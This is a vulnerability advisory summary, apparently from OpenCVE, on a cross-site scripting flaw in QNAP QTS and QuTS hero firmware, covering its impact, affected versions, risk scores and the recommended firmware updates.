Impact
This vulnerability is a cross‑site scripting flaw that allows remote attackers to inject malicious JavaScript into web pages served by QNAP's QTS and QuTS hero firmware. The injected script is executed in the victim's browser, which can read application data, modify page content, or bypass authentication controls. The issue is classified as CWE‑79 and the CVSS score of 6.3 indicates a moderate impact on confidentiality and integrity.
Affected Systems
The flaw affects QNAP Systems Inc. QTS devices running firmware earlier than 5.2.9.3492 build 20260507 and QuTS hero devices with firmware prior to 5.2.9.3499 build 20260514, 5.3.4.3500 build 20260520, or 6.0.0.3500 build 20260520. Earlier firmware versions listed in the advisory are also impacted.
Risk and Exploitability
Attackers can exploit this XSS remotely through the web management interface by submitting specially crafted input that is not properly escaped. The likely attack vector is the web interface that accepts user‑supplied data. The EPSS score of less than 1 % reflects a very low but non‑zero likelihood of exploitation at present. The CVSS score of 6.3 represents a moderate risk, and the vulnerability is not included in the CISA KEV catalog, indicating no known public exploits. The most effective mitigation is to apply the vendor‑released firmware updates immediately.
OpenCVE Enrichment